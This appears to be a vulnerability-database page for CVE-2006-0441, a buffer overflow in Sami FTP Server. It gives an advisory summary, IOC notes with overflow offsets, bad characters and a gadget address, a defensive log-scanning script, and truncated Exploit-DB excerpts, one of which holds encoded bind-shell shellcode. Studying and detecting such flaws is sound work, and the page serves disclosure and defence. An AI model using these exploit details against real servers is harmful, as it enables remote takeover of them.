CVE-2006-0441
Published 2006-01-26
Priority: P356 · Severity: high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public exploit code available (see Exploit-DB and Metasploit entries below)
EPSS: 70.42% (99.3rd percentile)
Stack-based buffer overflow in Sami FTP Server 2.0.1 allows remote attackers to execute arbitrary code via a long USER command, which triggers the overflow when the log is viewed.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| karjasoft | sami_ftp_server | — | — |
| karjasoft | sami_ftp_server | — | — |
| karjasoft | sami_ftp_server | — | — |
Detection & IOCs (extracted from sources)
- The overflow is triggered when the FTP server administrator views the log GUI, so the exploit is passive/deferred, not immediate. Detection should focus on oversized USER/PASS commands written to the log file rather than on an immediate crash.
- The payload persists across restarts via the binary log file SamiFTP.binlog; shellcode re-executes on every server restart until the log file is manually deleted.
- The overflow offset is at 596 bytes in the USER field; the SEH overwrite occurs at 600 bytes. Alert on FTP USER or PASS commands exceeding ~596 bytes.
- Bad characters for payload encoding are the null byte, CR, LF, space, and 0xFF; any FTP USER/PASS payload that avoids these bytes but exceeds 596 bytes is suspicious.
- Banner check: the server responds with 'Sami FTP Server 2.0.2'; use this banner string to identify vulnerable instances during network scanning.
- The SEH-based exploit uses a pop/pop/ret gadget in tmp01.dll at 0x10022ADE; presence of this module loaded in the Sami FTP process space indicates a vulnerable configuration.
- Return addresses are OS/SP/locale specific; the listed ROP gadgets target ws2help.dll on Windows 2000 (EN/IT/FR) and Windows XP SP0/1 EN only, and will not work on other platforms without adjustment.
- Payload space is limited to 300 bytes with a stack adjustment of -3500 in the Metasploit module; larger staged payloads may not fit without modification.
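As an added example (not from this page or from any of the indexed exploit sources), the following detector turns the IOC list above into something that can be run over FTP control-channel log lines: it flags USER/PASS commands whose argument reaches the 596-byte overflow offset, notes when such an argument contains none of the listed bad characters (the shape an encoded payload has), and records the 'Sami FTP Server 2.0.2' banner as a fingerprint. The log line layout, the `Finding` record and all function names are assumptions made for this example; the sample log is constructed, not captured traffic.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Thresholds and strings taken from the IOC list above. Everything else (log
# layout, record names) is an assumption made for this example.
OVERFLOW_OFFSET = 596                        # USER field overflow offset in bytes
VULNERABLE_BANNER = "Sami FTP Server 2.0.2"
BAD_CHARS = {0x00, 0x0A, 0x0D, 0x20, 0xFF}   # NUL, LF, CR, space, 0xFF

# Assumed log line layout (constructed): "<timestamp> <client-ip> <C>|S>> <text>"
# "C>" marks a client-to-server command, "S>" a server reply.
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<dir>[CS]>) (?P<text>.*)$")
CMD_RE = re.compile(r"^(?P<verb>USER|PASS)\s+(?P<arg>.*)$", re.IGNORECASE)


@dataclass
class Finding:
    ts: str
    client: str
    kind: str      # "oversized_cmd" or "vulnerable_banner"
    detail: str


def payload_avoids_badchars(arg: bytes) -> bool:
    """True when none of the bytes the IOC list calls bad characters occur.
    An oversized argument that dodges all of them looks like an encoded
    payload rather than an accidentally long username."""
    return not any(b in BAD_CHARS for b in arg)


def scan_line(line: str) -> Optional[Finding]:
    m = LINE_RE.match(line.rstrip("\r\n"))
    if not m:
        return None                          # not in the assumed layout; skip
    ts, client, direction, text = m.group("ts", "client", "dir", "text")

    # Server banner fingerprint: the version string the IOC list names.
    if direction == "S>" and VULNERABLE_BANNER in text:
        return Finding(ts, client, "vulnerable_banner", text)

    # Client command: USER/PASS with an argument at or past the overflow offset.
    if direction == "C>":
        c = CMD_RE.match(text)
        if c:
            arg = c.group("arg").encode("latin-1", "replace")
            if len(arg) >= OVERFLOW_OFFSET:
                detail = f"{c.group('verb').upper()} argument is {len(arg)} bytes"
                if payload_avoids_badchars(arg):
                    detail += " and contains none of the known bad chars"
                return Finding(ts, client, "oversized_cmd", detail)
    return None


def scan(lines: Iterable[str]) -> List[Finding]:
    return [f for f in (scan_line(l) for l in lines) if f is not None]


# Constructed sample log, not captured traffic.
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z 192.0.2.10 S> 220 Sami FTP Server 2.0.2",
    "2024-01-01T10:00:01Z 192.0.2.10 C> USER anonymous",
    "2024-01-01T10:00:02Z 192.0.2.11 C> USER " + "A" * 700,   # past the 596-byte offset
    "2024-01-01T10:00:03Z 192.0.2.11 C> PASS " + "B" * 595,   # just under it: no alert
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.client} {f.kind}: {f.detail}")
```

Because the trigger is deferred until an administrator opens the log GUI, the oversized-command finding is the one worth acting on before any crash is seen; the IOC list also notes that the payload lives on in SamiFTP.binlog, so a hit here is a reason to inspect and remove that file before the service is restarted.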
GHSA-x3r2-p3h2-85wm: Buffer overflow in KarjaSoft Sami FTP Server 2
GHSA (unreviewed) · 2022-05-14 · CVSS 7.5 · CVE-2008-5106 [HIGH] · CWE-119
Buffer overflow in KarjaSoft Sami FTP Server 2.0.x allows remote attackers to cause a denial of service (daemon crash) and possibly execute arbitrary code via a long argument to an arbitrary command, which triggers the overflow when the SamyFtp.binlog log file is viewed in the management console. NOTE: this may overlap CVE-2006-0441 and CVE-2006-2212.
GHSA-92cm-crm8-frm2: Stack-based buffer overflow in Sami FTP Server 2
GHSA (unreviewed) · 2022-05-01 · CVE-2006-0441 [HIGH]
Stack-based buffer overflow in Sami FTP Server 2.0.1 allows remote attackers to execute arbitrary code via a long USER command, which triggers the overflow when the log is viewed.
No detection rules found.
Exploit-DB: KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
exploitdb · 2016-11-01 · CVE-2006-0441
---
#/usr/bin/python
#-*- Coding: utf-8 -*-
### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ###
# Date: 2016-01-11
# Exploit Author: n30m1nd
# Vendor Homepage: http://www.karjasoft.com/
# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
# Version: 2.0.2
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Thanks to PHRACK for maintaining all the articles up for so much time...
# These are priceless and still current for exploit development!!
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Open Sami FTP Server and open its graphical interface
# * Run this python script and write
Exploit-DB: KarjaSoft Sami FTP Server 2.0.2 - USER Remote Buffer Overflow (Metasploit)
exploitdb · 2010-04-30 · CVE-2006-2212
---
##
# $Id: sami_ftpd_user.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'KarjaSoft Sami FTP Server v2.02 USER Overflow',
'Description' => %q{
This module exploits the KarjaSoft Sami FTP Server version 2.02
by sending an excessively long USER string. The stack is overwritten
when the administrator attempts to view the FTP logs. Therefore, this exploit
is passive and requires end-user interaction. Keep this in mind when selecti
Exploit-DB: KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow
exploitdb · 2007-01-17 · CVE-2006-0441
---
#!/usr/bin/perl
# Exploit for SAMI FTP version 2.0.2
# USER/PASS BUFFER OVERFLOW ARBITRARY REMOTE CODE EXECUTION (CALC.exe)
# You can put your own shellcode to spawn a shell
# Thursday 17th Jan 2007
# Tested on : Windows 2000 SP4 (Use your own return address for other flavors)
#
#
#
# Coded by UmZ! [email protected]
# On behalf of : Secure Bytes Inc.
# http://www.secure-bytes.com/exploits/
#
#
#
# Special Thanks to Ahmad Tauqeer, Ali Shuja and Uquali
#
#
# Disclaimer: This Proof of concept exploit is for educational purpose only.
# Please do not use it against any system without prior permission.
# You are responsible for yourself for what you do with this code.
#
#
# Note: After executing the exploit You will get "Ca
Exploit-DB: KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)
exploitdb · 2007-01-14 · CVE-2006-0441
---
/************************************************************************
*KarjaSoft Sami FTP Server 2.0.2 USER/PASS buffer overflow *
* *
*Sending a long USER / PASS request to server triggers the vulnerability*
*EAX and EDX are owned leading to code execution *
*This is only a POC *
*Thanks to rewterz and Muhammad Ahmed Siddiqui for discovery *
* *
*Usage: sami.exe ip port *
* *
*Coded by Marsu *
************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
struct hostent *he;
struct sockaddr_in sock_addr;
WSADATA wsa;
int ftpsock;
char recvbuff[1024];
char evilbuff[1
Exploit-DB: KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)
exploitdb · 2006-01-31 · CVE-2006-0441
---
// Two includes.
#include
#include
// Project - Settings - Link > Object/Library modules 'Ws2_32.lib'
#pragma comment(lib, "ws2_32")
char MyShellCode[] = // XOR by \x99\x99\x99\x99.
"\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99"
"\x99\x99\x83\xEB\xFC\xE2" // Bind ShellCode port 777.
"\xF4\x71\xA1\x99\x99\x99\xDA\xD4\xDD\x99"
"\x7E\xE0\x5F\xE0\x7C\xD0\x1F\xD0\x3D\x34\xB7\x70\x3D\x83\xE9\x5E"
"\x40\x90\x6C\x34\x52\x74\x65\xA2\x17\xD7\x97\x75\xE7\x41\x7B\xEA"
"\x34\x40\x9C\x57\xEB\x67\x2A\x8F\xCE\xCA\xAB\xC6\xAA\xAB\xB7\xDD"
"\xD5\xD5\x99\x98\xC2\xCD\x10\x7C\x10\xC4\x99\xF3\xA9\xC0\xFD\x12"
"\x98\x12\xD9\x95\x12\xE9\x85\x34\x12\xC1\x91\x72\x95\x14\xCE\xB5"
"\xC8\xCB\x66\x49\x10\x5A\xC0\x72\x89\xF3\x91\xC
Exploit-DB: KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)
exploitdb · 2006-01-25 · CVE-2006-0441
---
##
# Written by redsand
#
# This is simple, look for a {call,jmp} esp
##
package Msf::Exploit::pmsoftware_samftpd;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'PMSoftware Samftpd Remote Exploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ '', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'USER' => [1, 'DATA', 'Username', 'redsand0wnedj00'],
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x20",
'Keys' => ['+ws2ord'],
# 'Prepend' => "\x81\xc4\xff\xef\
Exploit-DB: KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow
exploitdb · 2006-01-25 · CVE-2006-0441
---
#!/usr/bin/perl
# Sami FTP Server v2.0.1 Remote notepad.exe execution PoC by Critical Security research http://www.critical.lt
# Tested on Windows XP SP2, Windows XP SP0 and even on FreeBSD 6.0-RELEASE Wine 0.9.6 :))
use Net::FTP; # new($host, Debug => 0) or die "Cannot connect: $@";
$user = "A" x 213 . # ride up to the return :O (shellcode could be stuffed in here too :) )
"A" x (15 - $c) . # a few more bytes for alignment, because the IP address also gets written onto the stack, so where the ret address goes has to be computed from it
$offset . # ret address pointing at some DLL's call esp or jmp esp, or anything similar; what matters is that we land in esp ;)
"\x90" x 25 . # nop sled, to line up with the address held in esp
# shellcode that launches notepad
Metasploit: KarjaSoft Sami FTP Server v2.0.2 USER Overflow
This module exploits an unauthenticated stack buffer overflow in KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long USER string during login. The payload is triggered when the administrator opens the application GUI. If the GUI window is open at the time of exploitation, the payload will be executed immediately. Keep this in mind when selecting payloads. The application will crash following execution of the payload and will not restart automatically. When the application is restarted, it will re-execute the payload unless the payload has been manually removed from the SamiFTP.binlog log file. This module has been tested successfully on Sami FTP Server versions: 2.0.2 on Windows XP SP0 (x86); 2.0.2 on Windows 7 SP1 (x86); 2.0.2
No writeups or analysis indexed.
References
- http://downloads.securityfocus.com/vulnerabilities/exploits/sami_ftp_poc.pl
- http://secunia.com/advisories/18574
- http://www.critical.lt/?vulnerabilities/208
- http://www.karjasoft.com/samiftp/news
- http://www.securityfocus.com/archive/1/423148/100/0/threaded
- http://www.securityfocus.com/bid/16370
- http://www.vupen.com/english/advisories/2006/0317
- https://exchange.xforce.ibmcloud.com/vulnerabilities/24325
- https://www.exploit-db.com/exploits/40675/